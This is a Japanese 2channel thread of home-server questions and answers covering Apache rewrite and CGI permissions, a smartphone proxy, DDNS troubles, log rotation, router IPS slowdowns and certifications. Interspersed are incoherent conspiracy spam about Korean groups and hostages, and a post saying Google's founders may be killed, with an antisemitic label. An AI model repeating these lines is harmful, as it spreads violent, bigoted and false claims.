
これで自宅サーバーを始めようかなと思っているのですが、
初心者にはあまり向かないでしょうか？
ファンレスで低消費電力なので惹かれているのですが。。
http://pc.watch.impress.co.jp/docs/column/nishikawa/20090827_310875.html

>>307
２４時間駆動にどれだけ耐えられるかしらないけど
それ以外は十分な性能。
やってみればいい、俺の黒箱時代よりは快適だろw

>>307
・自宅鯖でやりたいことは、そのメモリやストレージの容量で可能か?
　(ストレージはUSB外付けHDDで逃げられるかも)
・無線LANしかないので、突然基地局を見失うと困りそう。
　(USB-LANアダプタとかで逃げられるかも)
ぐらいかなぁ。Ubuntu標準塔載なのがステキだね。

>>308
ありがとうございます、とりあえずやってみます！

>>309
まだ何がやりたいかすらよくわかってない段階なので、
WEBサーバーで色々実験とかしてみたいと思います。
それと、この機種のCPUを使ってる機種だと、インテルのとかと比べて
OSの中身とかも若干違ってくるという事を聞いたのですが、
初心者でも問題なく使えそうでしょうか？

>>310
自信ないならx86系のCPU積んだPC買えば？
Linux触ったことが無いならもっと無難な機種を選ぶべきだと思うけどな。
最終的に運用するのは自分なんだし。

俺としてはOSがカスタム版なのが気になるな。

Debian系が使えりゃ使えそうだけど。

>>310
非公開鯖なら何も言わんけど、
今月でOSのアップデートが終了ってのが一番気になるくらいかな。
ttp://www.sharp.co.jp/support/mit/soft_update.html

実験用途なら、
>>311の言うようにx86系のCPU積んだPCの方が選択肢が広いし、
非公開鯖にするなら、VirtualBoxとか入れて仮想環境を構築すれば良いと思うよ。

みなさんありがとうございます
実はもうPC-Z1は持っていて、iPhoneを使っているうちに
すっかり持ち運ばなくなってしまったので、
サーバーとして使用できるかなと思っていました。

でもみなさんの書き込みを見て、ちょっとクセ？
があるようなので、色々とやってるうちに
あーこれなら普通のPCでやっときゃよかったー
てな事にもなりそうなんで、X86ってやつでやってみます。

とにかく音が気になるんで、イオシスで中古が4980円で売られていた
HPのt5720にしようと思うのですがどうでしょう？
こういうのより、ちゃんとサーバー用として売られている物の方がいいのでしょうか？
というよりも、なんでもいいからやってみろってな感じかもしれませんが。。

>>314
いいなぁ、俺も欲しかったんだよな。

ノートPCで充分だと思うよ。
ネットブックにVirtualBoxで運用中。

ノートPCは蓋閉めなで運用すると凄く邪魔。
でも蓋閉めると排熱効率が落ちてただでさえ短いパーツの寿命がさらに縮む。

ちょっと前に、自宅pc等でサーバーを走らせて、用途別のスクリプト？ プラグイン？を
実行させとくと、webをスクレイピングしてメールしてくれたり色々できるような
ツールが一瞬話題になったと思うんですが、何て名前か思い出せないし検索でも
見つけられません。何て名前だったか教えてください。

apacheのログ眺めてたら中華からHEADリクエストがきてる
何これこわい・・・

スマホから2ちゃんに書き込みたいんだけど、ずっとspmode.ne.jpが規制されてるんで、自宅鯖にfreeproxy入れてみた
最低限の踏み台対策として何やればいい？
とりあえずポート番号は5桁の適当な数字に変えた

できればアクセス元アドレスも制限したいんだけど、電話機のIPアドレスを調べてみたら接続ごとにコロコロ変わるんで
ピンポイントで指定できない、というか現時点では範囲もよくわからない
docomoの割り当てをwhoisで調べてその範囲を全部指定すればいいんか？

>>319
認証機能つかっとけば？

どうしても無理っていう事情がないなら認証を使うべき
かなり狭い範囲だけならいいかもしれないけどdocomoは多いし

ありがとう
とりあえずパスワード認証が簡単で無難のようですね

今は外出中なので帰ったら設定してみます
この書き込みが成功すれば自宅鯖は正常動作です

最低ダイジェスト認証だろ。BasicならSSL通せハゲ。

>>319
求めてる回答ではないだろうがrep2いいぞ。

>>319
一応、iモードとspモードはIPアドレス公開してるから、
範囲指定もできなくはない
http://www.nttdocomo.co.jp/service/developer/make/content/ip/index.html
http://www.nttdocomo.co.jp/service/developer/smart_phone/technical_info/etc/index.html

ただし、これで絞り込んだところで、ドコモユーザなら誰でも使えるわけだし、
どの程度有効なんだろうね

ちなみに、俺はこれを真似して、自宅のrep2とかに繋いでる
http://www.gcd.org/blog/2011/06/806/

stoneはplayストアにもあるけど、「\D」置換には未対応のようだったので、
自前ビルドした
置換せず接続先固定なら、playストアので十分だと思う

connectbotでsshのポートフォワード使って繋ぐのが簡単だったんだが、
最近試すと頻繁に落ちてしまう状況だな、うちは。

t

Apacheの設定で、ユーザにどこにアクセスされても
/var/www/cgi-bin/index.cgiにアクセスするようにしたいです。

色々調べてhttpd.confのActionというﾃﾞｨﾚｸﾃｨﾌﾞを使うことで
それが実現可能だということがわかったのですが、

<Directory "/var/www/html">
# 略
ForceType text/html
Action text/html /cgi-bin/index.cgi
</Directory>

としても、ユーザがアクセスした場所にhtmlなどのファイルが無いと
NotFoundのエラーが表示されてしまいます。
（ファイルがある場合はindex.cgiにアクセスされる）

ファイルが無くても正しくindex.cgiにアクセスされるように設定したいのですが
その他どのような設定を施せばよろしいでしょうか？？

>>328
その場合だとmod_rewriteが適任だな

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^/.* /cgi-bin/index.cgi [L]
</IfModule>

としてみたんだけど、NotFoundとなってしまう(´Д⊂ヽ

RewriteCondが抜けとるがな。

<IfModule mod_rewrite.c>
RewriteEngine on
RewriteRule ^(.*)$ /var/www/cgi-bin/main.cgi
</IfModule>

でいけますた！(ﾟ∀ﾟ)
ありがとう！

Forbidden
You don't have permission to access /cgi-bin/ on this server.
って出てcgiが実行されない。
/var/www/cgi-bin/index.cgi
のように確かに作ったんやけど・・・
DocumentRoot /var/www
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /var/www/
        <Directory "/var/www/cgi-bin">
                AllowOverride All
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>

You don't have permission to access

お前の脳にもパーミッションかかってるの？

chown -r www-data:www-data /var/www/cgi-bin

これでいけるよ

いやいやchown -r apache.apacheの方かも知れんぞ

俺はchown -Rを推すぜ。

>>335
これ実行したら
sudo chown -R www-data:www-data /var/www/cgi-bin
[sudo] password for razama:
razama@raza:~$
>>336
chown -R apache.apache
chown: `apache.apache' の後にオペランドがありません
詳しくは `chown --help' を実行して下さい。
razama@raza:~$

cgi-binの直下に
hello.cgiとindex.cgiと二つ入れてみたけど
cgi-binにそのままアクセスするとForbiddenって出るけど
cgi-bin/hello.cgiにアクセスすると正常に表示される
なんでだろう・・

ls-lt
drwxr-xr-x 2 www-data www-data 4096 2012-05-06 03:02 cgi-bin
razama@raza:/var/www/cgi-bin$ ls -lt
合計 8
-rwxr-xr-x 1 www-data www-data 101 2012-05-06 03:38 hello.cgi
-rwxr-xr-x 1 www-data www-data 327 2012-05-06 03:02 index.cgi

>>338
そんな初歩的な事までいちいち説明しなきゃならんの？
あんたのレベルなら入門書でも読んだ方が遙かに利口だと思うが
どうせ今後も疑問がぽろぽろぽろぽろ湧いてくるんだろ

コマンドを理解せずにホイホイ実行してるのかｗ

>>339
ちょうど入門書探してるところです。
お勧めの入門書あったら教えてください。

恥を知らない奴ってのは強いなぁ

>>338
最後の情報で判った。DirectoryIndexで検索してみて。

なんか性格悪い奴ばっかだな
俺も全然詳しくないから偉そうな事言えないけどさ

愛の鞭a.k.a.け・い・こ・くダヨ☆

>>341
悪いが俺はRH系のディストリ使ってるから、お前さんには毒にしかならんだろうな
本屋で自分の使ってるディストリのサーバ構築本を読み漁るのが良いんじゃね？
apacheの基本的な部分ならどのあたりの何を触ればいいかそれで分かるだろ

apacheなら公式にいけば情報はたっぷりあるけど、理解できるかどうかは別だからな

>>343
.htaccessにDirectoryIndex index.php index.htm index.html index.cgi
と/etc/apache2/apache2.confにも同様にやってみたけどやっぱり…表示されない
>>346
本屋行かないと何も始まらなさそうですね
本屋行って自分に合った本を探してくるわ。
情報thanks!

1. CentOS5.5
2. Apache2.2.8
3. 東日本 Bフレッツ マンションタイプ
21ip.jpの固定IPアドレスプラン

　　　WAN
　　　　｜
モデム
NTT VH-1004ES
　　　　｜
スイッチングハブ
BUFFALO LSW3-GT-5EP
　｜　　　　　　　　　　　　｜
ルータ（ISP：21ip）　　　ルータ(ISP：plala)
Cisco RVS4000-JP　　NEC AtermWR8300N
　｜　　　　　　　　　　　　｜
自宅サーバ　　　　　　家庭用LAN


現在では以上のような接続にしているのですが、以前はAtermWR8300Nの一つだけで、
モデムからAtermWR8300Nに直接繋いで、AtermWR8300Nのマルチセッションなどを利用して、
朝日ネットの固定IPアドレスプランを利用してサーバを公開していました。

ですが先日、AtermWR8300Nの管理画面が重くなって接続出来ないことが増えてきたため、
RVS4000-JPを新しく購入し、さらにプロバイダを21ipで新規契約して上記のような接続に変更しました。

しかし、muninで確認したところ自宅サーバのHTTPサーバの速度が、最高で上り20Mbpsしか出なくなってしまっていました。
どうすればもっと速度が出るようになるでしょうか。

FTPで同じサーバからファイルをダウンロードしてみると、その時の速度は6、70Mbpsくらいになっているので、
ルータの問題などではないと思いますし、
モデムからルータに直接繋いでみても速度は変わらないので、ハブの問題ではないと思います。
また、プロバイダを朝日ネットに変えてみても速度は遅いのでプロバイダの問題でもないのだろうと思います。

もしかすると見当違いなことをやっているかも知れませんが、是非ご教授ください。

とりあえずすべての機器を再起動してみるとか

俺も以前RVS4000-JPを購入してただのネット閲覧用途で使っていたんだけど、
機器が起動した直後はRadishの速度測定結果でUp：180Mbps/Down：80Mbps程度出るのに
数時間から数日間経つとUp/Down共に20Mbps程度に落ち込んでしまう事象が発生した。
試行錯誤した結果、機器を再起動するかIPSを無効にすると前者の速度に戻ると分かった。
機器を再起動せずにIPS無効〜再度有効化しても後者の速度のまま回復しないようで、
仕方ないから定期的に再起動かけて使ってた。
IPSとかあんまり明るくないんでこういう仕様なのかどうかは分かりかねるし、
こちらこそ見当違いだったら申し訳ないけど状態が似てたんで一応確認してみて欲しい。

>>349
>>350
ありがとうございます！
RVS4000-JPのIPSを無効にし、リブートをかけてやると前までのような速度が出るようになりました！
仰るように今後速度が落ちてくるのかも知れませんが、当面はそうなったら再起動するようにしたいとおもいます。

今日の俺のオナラ臭いな

>>351
治ったんだ。よかったね。
多分IPSさえ有効にしなければ再起動かけずに速度を維持できるはず。

つかせっかく面白い機能がついてるのに無効にせざるを得ないのは残念。
俺は以前使っていた1812に切り戻しちまったよ。

原爆も作らせ、投下させた「挺陝」製を操る朝鮮総連と名乗る一族の犯罪者一族…

世界中の著名人が未だに下記の犯罪グループの餌食となり続けている。

人質として監禁、拘束されて２年半以上。

live映像が壁や脳裏に写し出される…主犯は小学校の同級生だから判る。(T_T)

神奈川県内での 不法滞在の朝鮮工作員
「朝鮮総連」や「自民党」と名乗る
「自民党のヒットマン支那(級・科)」一族の拘束、監禁中の世界中から「無差別爆撃・殺人」の脅迫で集められた人質をアジアに御確認下さい。

「朝鮮総連」と言う組織が存在しない事も合わせて御確認下さい。

人質を監禁しながらのサイバーテロリスト一族は「リコール」「砂の器」応用の世界規模の電気と電波テロリストです。

亡命の為の偽装クーデターです。

「aguse.jp」というサイトでドメインを検索すると
同一サーバ上で運営されているサイトが一覧表示されますけど
このサイトはどうやってそういった情報を調べているのでしょうか？

誰かがサイト上で調べいたいURLを入力 ・・・＞ これが繰り替えされた場合に
同じIPであった場合に同一サーバ上で運営されている
といった感じで判定しているのでしょうか？

※これしか方法が思いつかないのですが、何か他にも方法があるのでしょうか？

落雷いやだよ

>>355
検索エンジンとか自前のクロウラーとかでひたすらドメイン名っぽいものを収集
→ひたすら正引き→DB化、とか?

>>357
ありがとうございます。
やっぱりそれでしかわかりようがないですよね。

【ネット】 警察庁 「２ちゃんねるは犯罪の温床」「サイト管理者を共同正犯で摘発する」★２
http://uni.2ch.net/test/read.cgi/newsplus/1336628702/

Linux板のくだ質に書いたのですが、自宅サーバ板のほうがいいのでは
ということで誘導されてきました。

DynDNSのことなんですが、適切なスレがなかったのでこちらでお聞きします。
----------
DynDNS　+　ddclinet
で不具合出てる方いますか？

4〜5日前に突然Webサーバに繋がらなくなってIP調べたら
実際に割り当てられているグローバルIPと、
ホストを逆引きしたIPが一致しないのです。

更新は300秒ごとでddclientも動作しています（DynDNSのページで
更新もしました）。

一年くらい動かしていた旧環境のHDDに交換しても同様にIPが
一致しません。旧環境ではIPの不一致は過去一度もありませんでした。

DynDNSでWebサーバ遊びをするようになってからかなりの年月が
経ちますが、初めてのケースで困惑しています。

どなたかヒントだけでもご教示いただけませんでしょうか。
よろしくお願いします。
----------
↑これにたいして頂いたレスが
----------
> DynDNSのページで更新もしました
手動で更新しても反映されないってこと？
それならDynDNS側の問題だと思うけど。
----------
でした。

DynDNS　+　ddclinet　でWebサーバ運用されてる方、問題でてませんか？

何で固定ip買わないの？

おかねがもったいない

自鯖のために固定ip買うぐらいならvps運用のほうが賢いからな

>>360
まず、正しい自分のグローバルIPと、DynDNSに登録されてるIPが合ってるか確認するのが早いんじゃないかな。
あとddclientが取得してるIPと。

＞実際に割り当てられているグローバルIPと、
＞ホストを逆引きしたIPが一致しないのです。

どうでもいいけどホストからIP引いたら逆引きじゃなくね？

なんでエラーログを見ないの！？！？！！？！？！？！？

エラーログを見たら負けかなと思っている

グーグルbotが糞みたいにアクセスしてくるんだけど逮捕されないの？

される理由があるの？

質問です。

XP Pro SP3 で自宅サーバ構築してます。
不特定に公開しているものではないです。
主に外にいる時のファイルのやり取り用に立ててます。

主に稼働しているソフトは下記の通り；
VPN : SoftEther 1.0
FTP : Filezilla Server
リモート : Ultr@VNC Server
セキュリティ : Microsoft Security Essentials
ファイアウォール : Windows ファイアウォール

使用しているルータは NEC AtermWR7800H。

しばらくデータのやり取りをするとインターネット接続が切れてしまいます。
ローカルIPは固定しており、LAN内では見えているんですが、
インターネットとの接続が切れてしまっているため、サーバから外部に
アクセスしたり外からサーバに繋げることができません。
どの程度アクセスすると切断するかは、その時々によって違います。

ほぼ同じ構成で Windows 2000 で稼働させていた時はそんな事は
全くなかったのですが、XP に変えた途端このような事態が起きてます。

XP は固定IPに設定しているとこういう問題が起きる、なんて事は
ありますか？　他に何か原因はないでしょうか？
対処方法を教えてください。よろしくお願いします。

サーバ用OS使え
そいういうことはなくなるから

>>360
ddclinetは使ってないけど
Dynにログインして確認できる過去五日分の更新ログを見る限り
順調に通信できている

俺はもうVPSに移行してIP変わらないんだけど。

>>370
XP機はLAN内では通信できる。
対外ルータのAtermがハングアップしてるわけでもなく他のPCは外に通信できる。
何故かXP機だけが外にだけ通信できなくなる。

ということでいいのかな?
通信できなくなった時のXP機のルーティングは確認した?

その構成だとネットワークに影響ありそうなのはSoftEtherぐらいのように思われる。

>>364-367,372
早速のレスありがとうございます。

取り急ぎ>>364,372さんにレス書こうとした時に
もしかしてIPが一致してるのでは…？！と気づきアクセスしたところ…

なんと！！！！！
何事も無くつながりました！！！！！

設定も何もいじっておらず、全くもってまさに
狐につままれた感じです。取り敢えず復旧出来ました。

スレ汚しになってしまいましたが、
ありがとうございました。

>>368
Googleの基地外どもはお前さんの鯖も自分のリソースの一部だと思ってるので問題なし。
ブリン(ユダヤ人)、ラリーペイジ、エリクシュミトの３人は殺してもいいです。

>>375
そいつら曰く、「嫌なら公開すんな！」

>>370
ファイル名を指定して実行で、taskkill /im iexplore.exe /f　でIEを殺すと接続が復活したりしない?
web鯖の方のXPは問題ないけど普段使いのXP機がつべとか見てると高確率で接続が切れる
原因は不明

XPで鯖化するときの有名な問題点なんだよね。
それについて原因も対策もネット上にいくつも事例が公開されてる。
ググ様にはお伺い立ててみなかったのかな? 検索のやり方がまずかったんだろうかね。

回線引いて自宅サーバ使った方がアマゾンとか
かりるよりも安上がりだな。

そして安上がりにしたいからXP機を鯖にして
中華アタック受けて乗っ取られて
どこぞのアタック兵として踏み台にされるのか。

廃スペックを望まなければVPS借りた方が安上がりだと思う

電気代程度の維持費を払えば
ハードのメンテとか面倒な部分を丸投げできるからな

といいながら俺は自宅サーバだけどな
コスト度外視のやりたい放題できるから

俺はハード面を弄るのも好きだから自宅鯖だ

スマートフォンのドコモ回線がことごとく2ちゃん規制＋Wi-Fi環境も無いため、
BlackJumboDog(Version 5.6.1.0)を使って自宅のPC(Windows XP)をプロキシサーバーにしました。
スマホ用2ちゃん専ブラからプロキシを設定（ホスト名とポート番号を入力）して使えてはいるのですが、
プロキシサーバーのホスト名を任意(？)のものに固定するにはどうすればいいのでしょうか。

apacheのアクセスログファイルが大きすぎて鯖が落ちる事ってあるのでしょうか？
昨日、2GBのログが生成されたようですが、その後に鯖が落ちているようです。

なぜ鯖が落ちたのかの原因が掴めず、
もしかしたら「ログが肥大化してるのが原因？」と思い、質問しました。

ログファイルは毎日cronでリネームして過去ログ化させてないの?
あと、ログファイルを置く区画の容量は? DiskFull起こしてたりしてね。

>>386
お恥ずかしながら、全くの手つかず（デフォルト設定）です・・。
ログファイルを置く場所の容量は18GBなのですが、
現在のログファイルで10GB使っていました。

デフォルト設定なので、1週間毎にログファイルが分割されるのですが、
もしかしてそれが原因かもしれません。（ただ、原因がよく掴めていません・・・

いきなり巨大なログが生成されて落ちたって事は、アタックされたってことなんじゃないの？
そのログの内容はちゃんと確認したか？

>>388
はい。確認しましたが、自分の見る限りでは怪しいアクセスはありません。
また、中国とか他国からのアクセスは除外しています。

あ、除外はファイアーウォールでです。サイトにアクセスさせないようにしてるので、
2ちゃんでたまにあるF5アタックとかは無いと思うのですが・・・

>>385
古いApache httpd 1.3の環境で、ログ2GB越えると死ぬのは経験したことある。
新しい版で改善されてるかどうかは知らない。
OSやライブラリのバージョンでも違いがあるかもしれない。

>>384
DDNS
それより認証なり何なりをきちんとしたほうが良いかも

>>385
怪しいアクセスではなく一日2Gのログって相当エラー吐いてるんでないか。
正規ログとエラーログと切り分けて考えないと原因の切り分けができない。
個人鯖で2G/dayのログは異常

>>392
ありがとうございます！
仕組みはわかったので認証の件も含めて設定してみます

>>391
すみません、仕様書いてませんでした。
apache2.2系でCentOS5.5です。

>>392
いえ、1日ではなくて1週間分です。2G/weekです。
あと、アクセスログとエラーログは分けています。

とりあえず1日ごとに分ける設定にしてみました。
これで様子を見たいと思います。

ログ、いつまで保存するかね。

[質問]
ttp://sai-lab.ddns.net/diary/10039.htmlを参考にして、
mplayerをインストールしたいが、エラーが出る。

wget ftp://ftp.mplayerhq.hu/MPlayer/releases/mplayer-export-snapshot.tar.bz2
tar jxvf mplayer-export-snapshot.tar.bz2
cd mplayer-export-2012-05-11
./configure　←こいつがうまく行っているのか自信がない
make　←　エラー発生
[エラー内容]
make[1]: *** [libavformat/sctp.o] Error 1
make[1]: Leaving directory `/root/ffmpeg/mplayer-export-2012-05-11/ffmpeg'
make: *** [ffmpeg/libavformat/libavformat.a] エラー 2
[環境]
CenOS6.2　32bit　Mplayer（mplayer-export-2012-05-11）
[ONU]
　↑↓
[Router]
↑↓
[Server]

自己解決です。

# yum -y lksctp-tools
# yum -y lisctp-tools-devel
やったらうまくいきました。
スレ汚しスマソ。

[質問]
# cpan2rpm --no-sign --make-no-test --instal Time::HiRes
が失敗する
[エラー内容]
エラー Metadata retrieval
Tarball extraction: [/root/rpm/SOURCES/Time-HiRes-1.9725.tar.gz]
tar: 書き込みエラー
Unable to build module, the following dependencies have failed:
Test::MoreTest::More >= 0.82
Stopped at /usr/bin/cpan2rpm line 491.
cannot remove path when cwd is /tmp/BubvPp5cLM/Time-HiRes-1.9725 for /tmp/BubvPp5cLM: at /usr/share/perl5/File/Temp.pm line 902

# cpan2rpm --no-sign --make-no-test --instal Test::More
とするも、以下のエラー
エラー -- module: Test::More --
Module not found on CPAN web site! at /usr/bin/cpan2rpm line 1201.

Test::Moreがそもそもないため、インストールできない、、、。

[環境]
CenOS6.2　32bit
cpan2rpm cpan2rpm-2.028-1.noarch.rpm

[ONU]
　↑↓
[Router]
↑↓
[Server]

>>395
自分は月毎に固めておいて半年たったら捨ててる

DDNSの移行を行うために、前使っていたhttp://***.XXX.jp/
のサーバの .htaccess に

Redirect permanent / http://***.YYY.jp

と書いて、http://***.XXX.jp/***.html から http://***.YYY.jp/***.html
に行うようなリダイレクトを、無料でやってくれる所はありますか?

常時接続回線が一個しかなく、その回線は既に別のXXX.jpのDNSに使っており、
それをバーチャルホストにして複数のドメイン名でのアクセスができるように
したのですが、そのXXX.jpのサービスでは同一IPに複数のドメインネームを
割り当てようとすると、後から割り当てられたもののみ有効となるとの事
だったので、今は一日に何度か立ち上げるノートPCのApacheで、ノートを
立ち上げているときのみ、リダイレクトしています。

その状態よりましな状態にするサービス、何かないでしょうか。

>>395
割とどうでもいいログは容量圧迫する(邪魔になる)まで。
アクセスログ系はドキュメント用のHDDにデータ失うまで保存。

自宅に、別の場所からのデータの出し入れ(欲を言えば同期)がしたい。
要は俺専用ドロップボックス的な。
SVNでリポジトリにするしか無いかな。

>>402
owncloudはどう？

>>400
DDNSの移行というよりはドメイン名の変更をしたくて、
XXX.jpとYYY.jpを同じDDNS運営組織で管理しようとしてるのなら、
どちらか片方を別のDDNS運営組織で管理すればいいだけのような。

それ以外だと大抵何らかの費用がかかりそう。
どうしても同じDDNSじゃないとダメなら、有償で複数登録できると思う。
安価なVPSを利用すれば問題なく実現できる。
フレッツ系なら安価なISPと別途契約して無料期間を最大限活用するとか。

>>398
パッケージを作るのが目的ではなく単にperlモジュールをインストールしたいだけなら
素直にcpanコマンドでインストールすればいいのでは。

>>405
レスサンクスです。
すんません、そもそも自分でも何のコマンド打っているのかよくわかっていないので、
Perlやらcpanなりの背景を調べてみます。

再度、質問をまとめます。

>>404
具体的にはXXX.jpがddo.jpで、YYY.jpがmydns.jp何ですが、
無料の***.ddo.jp二つでは、同一IPでの利用ができないのです。
VPSって月額\400位からですかね。

>>407
なるほど。ならddo.jpはIPアドレス指定で更新をして、
あとはリダイレクト設定とドメイン持ち込みが可能な共用レンタルサーバで済みそう。
テキトーに検索したら共用レンタルサーバは月200円とかのがあるね。

>>407
ddoのログインして登録情報変更のオフライン転送
移行ってことはddoのほうはもう使わないって事だろうし、これで良いんじゃね？

これまではいつもレンタルサーバを
使っていたのですが何かと制限が多く
自宅サーバデビューしようと思っています。

現在、ディストリビューションとして CentOS 6.2 を考えているのですが
この選択についてどう思われますか？
（お勧めのディストリビューションを教えて下さい。）

FreeBSD-Currentなんてどうよ

>>410
いいんじゃない。Linuxはディストリ毎に作法は違うけど基本は一緒だし

>>411
やっぱりCentOSでいっちゃう事にします。

>>412
実は数年前にCentOSで自宅サーバ立ててたんですけど
電気代を考えるとレンタルの方が安上がりだなぁ〜なんて思って
しばらくレンタルサーバを使ってました。

さくらインターネットを使っていましたが
はっきり言ってサーバにユーザを詰め込み過ぎており
色々と自由が制限されて最悪でした。

ちょっとcronを走らせると勝手に止められたり。
やっぱり自宅サーバが一番ですね。

基本的な質問になってしまうかもしれませんが
Windowsマシンの場合にはセキュリティーソフトが必須かと思いますが
Linuxの場合にはなぜそういうソフトが不要なのでしょうか？

>>414
具体的にはどのタイプのセキュリティソフト？

>>415
Windowsだとインターネットセキュリティーとかふつうは入れますが
Linux環境の場合、たとえば各種ミドルウェアの脆弱性をあてるパッチしか
あてないですよね？

その点がなんか違う気がします。
※もっともWindowsをサーバとして使う人自体少ないとは思いますが。

>>416
＞Linux環境の場合、たとえば各種ミドルウェアの脆弱性をあてるパッチしかあてないですよね？

いや、そんなことはねーです。
元々脆弱性に対する防御手段が実装されてるのは確かですが、ClamAVなど無料の
ものからF-Secureなど商用のものまで各種取り揃えてます。
ちなみにマルウェアの類は大概「脆弱性を突かれた事に気付けなかったWEB鯖」から
蔓延していきます。大多数がLinux鯖です。

>>417
色々と詳しいっすねぇー。
勉強になります。

iptablesの設定だけでokとかいう風潮はどこから始まったんだろうな

>>416
Windowsとは手段が違うだけで対策が不要なわけじゃないぞ。
LinuxでもFWやIDSくらいは普通に導入するし。
OSの設計思想が違うからそうみえるだけ。

Windows使ってて便利だと思うのが「未登録アプリの通信を検知・遮断」なんだけど
あれLinuxじゃできないのかな?

それをIDSと呼ぶんだけどな

要望出したらGUFW辺りが実装してくれるんじゃね

>>409
おお！そんな辞める人ようのサービスまであったんですね。
さっそく設定してみました。まだDNSサーバには反映されてないみたいで、
転送されませんけど、様子見ます。いろいろ教えてくださった方
ありがとうございました！

自宅サーバのサイトにアクセスする時、
毎日１回目のアクセスは必ず失敗して、２回目以降は必ず成功する。
ルータとかiptablesとかがそういう症状を引き起こす事ってありうる？

ある
I/Oがタイムアウトする場合とか
キャッシュから消えてた場合とか

タイムアウトするまでの間に処理が半分進んでて、2回目で成功とかよくあるよ

でもアクセスが多いサイトじゃないし、軽いページなんだけど。
LAN内だから通信がボトルネックという事も無いと思うし
キャッシュとは？

パーツのどれかがスリープしてんじゃないの？

省電力設定でハードディスクが止まってたりとかね
趣味で作った鯖だと設定直し忘れるとかありがち

自宅サーバに外部から1IPを宅内に引いたとします。

そこで、DNS設定で下記の様に二つのドメインでアクセスがあった場合に
指定されたドメインに応じて、宅内の各サーバへ振分けを行いたいのですが
IP毎に振り分けを行わせるのはルータ側の設定ですか？

それとも、外部からのアクセスを判定する為にServer3を設けて
Server1 or Server2 へ振り分けを行わせるものなのでしょうか？

http://domain_server1.com/
→Server1

http://domain_server1.com/
→Server2

domain_server1.comへのアクセスをサーバ2台に振り分けたいってことだろ？
なら普通はLBで振り分けさせる。

>>430
後者。
Apache httpdなりsquidなりのName Base Virtualhostを理解するもので振り分け。
L7レベルの振り分けになるからルータの仕事ではないね。

ロードバランサというか、DNSラウンドロビンとでも言うか。
リバースプロキシでもnginxでも。

23

>>430
ドメインの名前書き間違えてると
エスパーしてみる。

俺もそう思った。
＞下記の様に二つのドメインでアクセスがあった場合
たぶんこうだろ↓

http://domain_server1.com/
→Server1

http://domain_server2.com/
→Server2

ＤｉＣＥはポート65001を開く必要がありますか？

皆さんはLPICとかって資格持ってますか？
また、どの程度でしょうか？

「どの程度」って？

宅鯖運用で得た知識は資格取るのに役に立つし、
資格は運用で資格は宅鯖で得た知識の証明にはなるが、

資格持ってても運用にはあんま役に立たないだよね。
この分野って必置義務資格も特に無いし。

Linux全般の知識を得る手がかりとしては、結構便利だと思うわ。
けど、コマンドのパラメータだの設定ファイルの書式だのを暗記するのは、割と時間の無駄だと思うわ。

LPICどのレベルをみなさん取得してますか？

資格が無駄だ無駄だと必死になって主張する奴の99％くらいは
取らないんじゃなくて取れない奴

>>443
>>442　の質問に答えてあげて。

なんで個人の趣味でやってる事でそんな資格取得しなきゃならんの？
これが答えだろ、察しろよ

ていうかLPIC高すぎるうえに2試験取らないと意味無いからな

ルータでファイアウォールがある場合はiptablesは必須ではないよね？
あったほうが良いとは思うけど、なくても概ね問題ないよね？

>>447
まぁね。

でも、アクセスログを見てると弾きたくなる奴が出てくるよ。

LAN内でバカやる心配が無いなら別に良いんじゃね？

>>445 >>446
LPICの資格を持ってない状態で
サーバを運用していてセキュリティーは大丈夫なんですか？

ITの現場でも自宅環境でも、資格持ち以上に物を知ってる人間は大勢いるからね。
自分の知識を簡単に証明する必要が無ければ、わざわざ資格は取らないんじゃないかな。
つか資格の範囲ってほんとに狭いし基本的なことしかカバーしてないからむしろそれだけじゃ知識不足な気がする。

>>450
逆に聞くが資格が無いとセキュリティのどの辺が問題になるんだ？
IDS？FW？ACL？アンチウイルス？強制アクセス制御？chroot？SSL？

>>450
>>441が実に的確な意見だと思う。
manとGoogle(とDebian使ってるんでapt-cache search)で大抵どうにでもなるし。

ていうかこの話題で初めてLPICって知ったんだけど、そんなメジャーなの?

IT業界でインフラやってると割りとよく耳にする資格だな。
インフラでもNWはCCNA、サーバはLPIC1を誰でも1度は受けてそうな感じ。

持ってるに越したことは無いが、持ってりゃいいってもんでもない
そんなもんだべ

あんまり沢山の資格持ってたら、逆に、
こいつ客先行かせて貰えなくて社内でずっと研修()させられてるのかな、
と思う位だけど。

趣味の世界では不要って事で。

IT資格を持つのは諸刃の刃。
給料がちょっと上がる可能性がある代わりに、デスマーチに放り込まれる
可能性も高まる。自分の価値に上限ができてしまうんだよね。

でっていう

持ってる人が語ればまだ説得力が無い事も無いがなぁ

仕事の話がしたいお馬鹿さんはこちらへどうぞ
http://engawa.2ch.net/linux/

>>460
持ってるなんて言おうものならﾌﾙﾎﾞｯｺじゃないですかー！ やだー！

まだ発生してる。
LAN内の別マシンのSVNサーバにはちゃんと繋がるから
ルータじゃなくWEBサーバの問題なのかなと思ってるんだけど
iptablesを切っても発生する。
他に何が原因になりうるだろう？
ネット上のHTTPテストとかで試しても、１回目は失敗で２回目は成功するから、
PCが悪いわけでもない。

>>463
とりあえずwiresharkなどでパケットを採取して解析すれ。

>>465
ログには何か無い？

>>463
そもそも失敗ってのが「どう失敗してるのか」を調べんと先に進まないぞ。
鯖が見つかってないのか、tcp:80が応答しないのか、connectしてるのにtimeoutしてるのか。

質問させて下さい。
Ubuntuで自宅サーバを構築し、Webサーバとして外部公開しています。
外部からはURLで正常にアクセス出来るのですが、内部ネットワークだとIPアドレス指定をしないと表示してくれません。
表示だけならばIPアドレスでも構わないのですが、WikiやWordPressの更新時にも引っかかってしまい困っています。
かなり昔、別のシステムを触っていたときはURLでアクセスが出来たのですが…。
見落としが多数あるかもしれませんが、是非ご教授願います。

まず>>1を見落としてるな

>>467
この手の質問は、なんで何回もカキコされるのか？

>>1を見る。

>>468-469
>>1から読みなおしてみました…が、解決に至りませんでした…。
ルータ側の機能の問題なのでしょうか。
使用しているルータはプラネックスのMZK-WG300NXです。

>>470
外部はﾋﾟｺｰﾝだけど内部はｼｮﾎﾞｰﾝなんだろ？
定番中の定番だな。これ以上ないくらい定番だ。
だから悪いがまともに回答する気が起きないんで>>1のリンク先もちゃんと読んでね。

一応ルータ側の機能の問題だけど、セキュリティポリシーだとか色々と事情あるみたいよ。

夜分恐れ入ります。

